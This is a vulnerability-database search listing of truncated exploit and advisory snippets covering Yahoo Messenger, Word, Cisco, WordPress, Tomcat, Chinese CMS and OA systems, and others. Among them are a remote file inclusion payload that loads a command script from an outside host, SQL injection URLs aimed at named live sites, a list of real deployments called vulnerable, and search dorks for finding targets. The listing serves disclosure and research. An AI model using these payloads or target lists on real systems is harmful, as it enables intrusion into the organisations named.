56796 matches found
Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2
No description provided by source. This affects the viewer ywcvwr.dll with yahoo messenger latest version tested. Fixed bug in last post x=0;xi800;x++ should be x=0; x800; x++ Here is your 2nd 0day!!! link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 ...
Microsoft Word畸形数据结构远程代码执行漏洞(MS07-014)
Microsoft Word是微软发布的非常流行的文字处理办公软件。 Microsoft Word在处理带有畸形数据结构的恶意文档时存在漏洞,远程攻击者可能利用此漏洞通过诱使用户打开恶意文档控制用户机器。 如果用户受骗打开了恶意的Word文档的话,则在解析文档中畸形数据结构时就会触发缓冲区溢出,导致执行任意指令。目前这个漏洞正在被名为Trojan.Mdropper.X木马积极的利用。 Microsoft Word Viewer 2003 Microsoft Word 2004 for Mac Microsoft Word 2003 Microsoft Word 2002 Microsof...
Cisco RV34X系列 权限提升漏洞(CVE-2021-1520)
Advisory: Cisco RV34X Series - Privilege Escalation in vpnTimer May 5, 2021 |In Research |By [email protected] TL;DR A few weeks ago, we published an advisory on the Cisco RV series routers, where we outlined the root cause for authentication bypass and remote command execution issues...
Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T
VENDOR DESCRIPTION “New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60...
BACKDOOR IN SONY IPELA ENGINE IP CAMERAS
EC Consult has found a backdoor in Sony IPELA Engine IP Cameras, mainly used professionally by enterprises and authorities. This backdoor allows an attacker to run arbitrary code on the affected IP cameras. An attacker can use cameras to take a foothold in a network and launch further attacks,...
OURPHP注册页面SQL注入漏洞
No description provided by source...
F5 TLS vulnerability (CVE-2016-9244) (Ticketbleed)
Ticketbleed CVE-2016-9244 is a software vulnerability in the TLS stack of certain F5 products that allows a remote attacker to extract up to 31 bytes of uninitialized memory at a time, which can contain any kind of random sensitive information, like in Heartbleed. If you suspect you might be...
HDCMS内容管理系统 spacecontroller.class.php 参数username SQL注入漏洞
0x01漏洞简介 HDCMS内容管理系统在文件spacecontroller.class.php处的参数username存在SQL注入漏洞。 0x02漏洞详情 member/controller/spacecontroller.class.php public function init //用户名 if $username = Q'username' $uid = M'user'-where"username='$username'"-getField'uid'; goU"index", array'uid' = $uid; $this-uid = Q'uid', 0, 'intval...
Hishop易分销系统 Brand.aspx,ProductUnSales.aspx 两处SQL注入漏洞
No description provided by source...
qemu内存泄露漏洞(CVE-2015-8567)
No description provided by source. !/bin/bash 这可能是最简单的exp吧... 原理很简单,根据详情分析,发现重新启动网卡就会调用vmxnet3activatedevice 然后堆就不停的分配内存 直到进程漰溃 这是一段bash shell脚本 eth1是我这里虚拟机上的vmxnet3设备 从开始运行直到漰溃用了我一個午觉时间,大概40分钟 其实具体情况按照自己本机机器来定,时间长短不一 root权限执行 while true do ifconfig eth1 down && echo 'Down!' ifconfig eth1 up &&...
Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure
No description provided by source. / cve-2010-3437.c Linux Kernel 2.6.36-rc6 pktcdvd Kernel Memory Disclosure Jon Oberheide [email protected] http://jon.oberheide.org Information: https://bugzilla.redhat.com/showbug.cgi?id=638085 The PKTCTRLCMDSTATUS device ioctl retrieves a pointer to a...
用友某办公平台SQL注入漏洞(system)
简要描述: 详细说明: 总 、 疯狗叔叔.....通用型的。。等待确认 全版本sql注入漏洞,直接拿下服务器的。。。无需登录 intitle:"fe协作" 涉及客户群体为: 大型企业(如:拉芳集团等等超大企业)、学校(北京师范)、医药、政府(如:珠海市人民防空办公室、广东省渔政总队珠海支队、广东煤炭地质局等等。。。)、能源(电网)、银行等等 http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74...
Joomla! Pbbooking组件'manage.php'跨站脚本漏洞
Bugtraq ID:66257 CVE ID:CVE-2013-5955 Joomla!是一套在国外相当知名的内容管理系统。 Joomla! Pbbooking组件'manage.php'脚本不正确过滤用户提交的输入,允许远程攻击者利用漏洞进行跨站脚本攻击,可获取敏感信息或劫持用户会话。 0 Joomla! Pbbooking 2.4 目前没有详细解决方案提供: http://www.joomla.org/ form...
Adobe Flash Player及AIR远程代码执行漏洞(CVE-2014-0502)
BUGTRAQ ID: 65702 CVECAN ID: CVE-2014-0502 Adobe Flash Player是一个集成的多媒体播放器。Adobe AIR是针对网络与桌面应用的结合所开发出来的技术,可以不必经由浏览器而对网络上的云端程式做控制。 Adobe Flash Player及AIR在处理含有特制Flash内容的恶意网页时存在多个漏洞,包括栈溢出、内存泄露、双重释放漏洞,未经身份验证的远程攻击者可利用这漏洞执行任意代码,最终完全控制受影响系统。 0 Adobe Flash Player 12.0.0.44 Adobe Flash Player 11.2.202.336...
Apache Commons FileUpload/Apache Tomcat拒绝服务漏洞
BUGTRAQ ID: 65400 CVECAN ID: CVE-2014-0050 Apache Commons FileUpload软件包可以向小服务程序和Web应用添加高性能的文件上传功能。Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 Apache共享文件上传存在解析畸形的Content-Type头时存在漏洞,使用特制的请求,远程攻击者可能会使程序崩溃。 0 Commons FileUpload 1.0-1.3 Apache Tomcat 8.0.0-RC1-8.0.1 Apache Tomcat 7.0.0-7.0.50 Apache Tomcat 6...
Drupal CKEditor模块任意代码执行漏洞
Drupal是一款开源CMS,可以作为各种网站的内容管理平台。 DrupalCKEditor模块存在一个未明安全漏洞,当启用core php模块时,允许远程通过验证的用户或远程攻击者通过文本过滤器中的text参数执行任意PHP代码。 0 Drupal CKEditor Module 6.x Drupal CKEditor Module 7.x Drupal FCKeditor Module 6.x 厂商解决方案 Drupal CKEditor Module 6.x-2.3, CKEditor Module 6.x-1.9,CKEditor Module...
IBM Lotus Expeditor请求标头欺骗安全限制绕过漏洞
BUGTRAQ ID: 54163 CVE ID: CVE-2012-0191 IBM Lotus Expeditor之前名为IBM WebSphere Everyplace Deployment,是用于创建、部署和维护各种应用的管理客户端。 IBM Lotus Expeditor 6.2 FP5+Security Pack之前的6.1.x和6.2.x版本中的Web容器没有正确执行请求的访问控制,在实现上存在安全限制绕过漏洞,可允许远程攻击者通过特制的请求标头,绕过某些安全限制。 0 IBM Lotus Expeditor 厂商补丁: IBM ---...
OpenLDAP CA SSL证书验证漏洞
CVE ID: CVE-2009-3767 OpenLDAP是一款开放源代码的轻量级目录访问协议(LDAP)实现。 在使用OpenSSL的时候,OpenLDAP的libraries/libldap/tlso.c库没有正确地处理X.509证书主题通用名称(CN)字段域名中的空字符(\0),在处理包含有空字符的证书字段时错误地将空字符处理为截止字符,因此只会验证空字符前的部分。例如,对于类似于以下的名称: example.com\0.haxx.se 证书是发布给haxx.se的,但/tlso.c库错误的验证给example.com,这有助于攻击者通过中间人攻击执行网络钓鱼等欺骗。...
WordPress wp-admin非授权管理访问漏洞
BUGTRAQ ID: 35935 CVECAN ID: CVE-2009-2853,CVE-2009-2854 WordPress是一款免费的论坛Blog系统。 Wordpress没有检查用户对某些操作的权限,远程攻击者可以通过直接请求wp-admin/中的edit-comments.php、edit- pages.php、edit.php、edit-category-form.php、edit-link-category-form.php、 edit-tag-form.php、export.php、import.php或link-add.php执行非授权编辑或添加操作,或通过直接请求...
CUPS cups/ipp.c空指针引用拒绝服务漏洞
BUGTRAQ ID: 35169 CVECAN ID: CVE-2009-0949 Common Unix Printing System(CUPS)是一款通用Unix打印系统,是Unix环境下的跨平台打印解决方案,基于Internet打印协议,提供大多数PostScript和raster打印机服务。 在处理包含有两个IPPTAGUNSUPPORTED标签的特质IPP时,CUPS的cups/ipp.c文件中的ippReadIO函数没有正确地初始化ipp结构,这可能导致受影响的应用崩溃。 cups/ipp.c文件中的ippReadIO函数负责初始化表示当前IPP请求中不同标签的ipp结构...
vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln
No description provided by source. Product : vsp stats processor Version : all Dork : "powered by vsp stats processor" Site: http://www.scivox.net/vsp/ Found by: Dimi4 Date : 31.03.09 Greetz: antichat SQL-injection + URL:...
Joomla/Mambo Component eXtplorer Code Execution Vulnerability
No description provided by source. ============================================= INTERNET SECURITY AUDITORS ALERT 2009-002 - Original release date: January 7th, 2009 - Last revised: March 2nd, 2009 - Discovered by: Juan Galiana Lara - Severity: 9/10 CVSS scored...
DMXReady Contact Us Manager <= 1.1 Remote Contents Change Vuln
No description provided by source. Title : DMXReady Contact Us Manager = 1.1 Remote Contents Change Vulnerability Author : "ajann" from Turkey Contact : : S.Page : http://www.dmxready.com $$ : 49.97 $ Dork : inurl:inccontactusmanager.asp DorkEx :...
Microsoft Windows SMB凭据反射漏洞(MS08-068)
BUGTRAQ ID: 7385 CVECAN ID: CVE-2008-4037 Windows是微软发布的非常流行的操作系统。 当用户连接到攻击者的SMB服务器时,Microsoft服务器消息块(SMB)协议处理NTLM凭据的方式存在远程代码执行漏洞,允许攻击者重放用户凭据,并在登录用户的下文中执行代码。如果用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据,或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 Microsoft Windows XP S...
RhinoSoft Serv-U FTP Server 'rnto'命令目录遍历漏洞
BUGTRAQ ID: 31563 CNCAN ID:CNCAN-2008100610 RhinoSoft Serv-U FTP Server是一款流行的FTP服务程序。 Serv-U FTP Server不正确处理'rnto'命令,远程攻击者可以利用漏洞以应用程序权限查看系统文件内容。 'rnto'命令不正确过滤输入,构建包含"../"字符的字符串作为参数,可绕过目录限制,以应用程序权限查看系统文件内容。 RhinoSoft Serv-U 7.2.1 目前没有解决方案提供: http://www.serv-u.com/ http://www.sebug.net/exploit/4803...
Linux Kernel 'truncate()'本地特权提升漏洞
BUGTRAQ ID: 31368 CVE ID:CVE-2008-4210 CNCVE ID:CNCVE-20084210 Linux是一款开放源代码的操作系统。 Linux内核'truncate'和'ftruncate'函数存在设计错误,本地攻击者可以利用漏洞提升特权。 当建立文件时,open/creat允许通过模式参数设置setgid位,由于bsdgroups mount选项或在setgid目录中建立文件,用户不属于新文件的组的成员。用户可以使用ftruncate和memory-mapped I/O使新文件成为任意两进制,获得此组的特权,原因是这些操作没有清除setgid位。...
Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability
No description provided by source. Title: Apache Tomcat Directory Traversal Vulnerability Author: Simon Ryeobar4mi at gmail.com, barami at ahnlab.com Severity: High Impact: Remote File Disclosure Vulnerable Version: prior to 6.0.18 Solution: - Best Choice: Upgrade to 6.0.18 http://tomcat.apache.o...
Boa 0.93.15 HTTP Basic Authentication Bypass Exploit
No description provided by source. / Boa HTTP Basic Authentication Bypass Vuln: Boa/0.93.15 with Intersil Extensions Original Advisory: http://www.securityfocus.com/archive/1/479434 http://www.ikkisoft.com/stuff/SN-2007-02.txt Luca "ikki" Carettoni http://www.ikkisoft.com / ---- !/usr/bin/env...
Check Point VPN-1/FireWall-1 4.1 SP2 Blocked Port Bypass Exploit
No description provided by source. / Summary A vulnerability exists in Check Point VPN-1/FireWall-1 4.1 SP2 that enables an attacker to establish connections to blocked TCP services through the firewall in certain configurations. We expect many deployed FireWall-1 installations to be immune to th...
IBM Lotus Domino Server 6.5 (username) Remote Denial of Service Exploit
No description provided by source. !/usr/bin/python Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS where 256+ but no more than 270 bytes for the username crashes the service...
Trend Micro OfficeScan Wizard和CgiRemoteInstall远程缓冲区溢出漏洞
Trend Micro OfficeScan是流行的反病毒解决方案。 Trend Micro OfficeScan存在多个安全问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务或缓冲区溢出攻击。 问题存在于"PCCSRV\Webconsole\RemoteInstallCGI\Wizard.exe"和"PCCSRV\Webconsole\RemoteInstallCGI\CgiRemoteInstall.exe"组件处理畸形参数时存在缓冲区溢出错误,提交精心构建的数据可能导致以应用服务程序进程权限执行任意指令。 Trend Micro OfficeScan Corporate Editi...
phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability
No description provided by source. PhpwCMS 1.2.6 = Multiple Remote file inclusion vulnerabilities Discovered by : |/| . .. | || ||| | | Vuln In : include $spawroot.'class/lang.class.php'; Affected Files : include/incext/spaw/dialogs/table.php include/incext/spaw/dialogs/a.php...
Retro64 CR64Loader ActiveX远程缓冲区溢出漏洞
CR64Loader对象是Retro64提供的一个ActiveX控件,用于提供在线游戏。 CR64Loader的实现上存在缓冲区溢出漏洞,如果用户受骗访问了恶意的WEB页面的话,就会触发这个漏洞,导致执行任意指令。 Retro64 CR64Loader 临时解决方法: 为以下CLSID设置kill bit: 288C5F13-7E52-4ADA-A32E-F5BF9D125F99 厂商补丁: Retro64 ------- 我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://retro64.com/...
Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability
No description provided by source. Title: Limbo CMS = 1.04 Remote File Inclusion URL: http://www.limbo-cms.com/ Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" Credits: Oo Exploit: /classes/adodbt/sql.php?classesdir=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-29...
New ceoAnyone Bug Identified in Multiple Crypto Game Smart Contracts (CVE-2018-11329)
Our vulnerability-scanning system at PeckShield has so far discovered several dangerous smart contract vulnerabilities batchOverflow1, proxyOverflow2, transferFlaw3, ownerAnyone4, multiOverflow5, burnOverflow6. These vulnerabilities typically affect various tokens that may be publicly traded in...
CPP-Ethereum JSON-RPC Denial Of Service Vulnerabilities(CVE-2017-12119)
Summary An exploitable unhandled exception vulnerability exists in multiple APIs of CPP-Ethereum's JSON-RPC. Specially crafted JSON requests can cause a unhandled exception resulting in denial of service. An attacker can send malicious JSON to trigger this vulnerability. Tested Versions Ethereum...
CPP-Ethereum JSON-RPC admin_addPeer Authorization Bypass Vulnerability(CVE-2017-12112)
Summary An exploitable improper authorization vulnerability exists in adminaddPeer API of cpp-ethereum's JSON-RPC commit 4e1015743b95821849d001618a7ce82c7c073768. A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to...
Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution
Description WebCTRL suffers from an authenticated arbitrary code execution vulnerability. The issue is caused due to the improper verification when uploading Add-on .addons or .war files using the uploadwarfile servlet. This can be exploited to execute arbitrary code by uploading a malicious web...
Broadcom: OOB write when handling 802.11k Neighbor Report Response(CVE-2017-11120)
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. In order to allow fast roaming between access...
一采通电子采购系统任意文件上传Getshell (UploadFile.aspx)
No description provided by source...
网康 NS-ASG 应用安全网关命令执行漏洞
No description provided by source...
致远A8-V5协同管理软件未授权访问(通杀V5,获取系统内各种缓存信息)
简要描述: 致远A8-V5协同管理软件存在未授权访问,可以利用普通用户权限访问system权限页面,获取大量缓存信息,如用户信息。 详细说明: 利用之前提交的漏洞“致远A8-V5协同管理软件日志信息泄露通杀V5”获取到的某弱口令用户对http://a8v51.seeyon.com进行测试,发现致远A8-V5协同管理软件还存在未授权访问,可以利用普通用户权限访问system权限页面,获取大量缓存信息,如2000+用户信息。 漏洞证明: 登录某普通用户 访问 http://a8v51.seeyon.com/seeyon/ctp/sysmgr/monitor/cacheDump.do...
Kerio Control 8.3.1 - SQL盲注漏洞
No description provided by source...
GLPI install.php Remote Command Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
Pligg CMS (story.php?id) 1.0.4 - SQL Injection Vulnerability
No description provided by source. / ! Pligg CMS story.php?id SQL Injection Vulnerability ! Author : Don Tukulesto [email protected] ! Homepage: http://indonesiancoder.com ! Date : Tue, April 27, 2010 ! Tune in : http://antisecradio.fm choose your weapon / Software Information Vendor :...
Xxasp 3.3.2 - SQL Injection
Securitylab.ir Application Info: Name: Xxasp Version: 3.3.2 Discoverd By: [email protected] Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir ===========================================================...
Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
No description provided by source. $Id: exim4stringformat.rb 11352 2010-12-16 17:30:24Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms ...
Google Chrome < 14.0.835.163 PDF File Handling Memory Corruption
No description provided by source. ----------------Security Adisory---------------- Title: Google Chrome 14.0.835.163 PDF File Handling Memory Corruption Vulnerability CVE-2011-2841 Sec-Security: Hich CVE-Number: CVE-2011-2841 Date of discovery: 04/06/2011MM/DD/YYYY Fix date: 06/28/2011MM/DD/YYYY...
Eyeland Studio Inc. SQL Injection Vulnerability
No description provided by source. Title: Eyeland Studio Inc. SQL Injection Vulnerability Version: 2.0 Author: Mr.P3rfekT Software Site:http://www.eyeland.com/ Tested on Lunix CVE : N/A Home :www.realmadridsy.com & www.v4-team.com/cc Founded By Mr.P3rfekT Dork :Eyeland Studio Inc. All Rights...
逐浪CMSSQL注入及绕过
简要描述: 官网及demo站点演示,绕过注入过滤。 详细说明: 这个点: http://www.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 http://demo.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 这样一下:...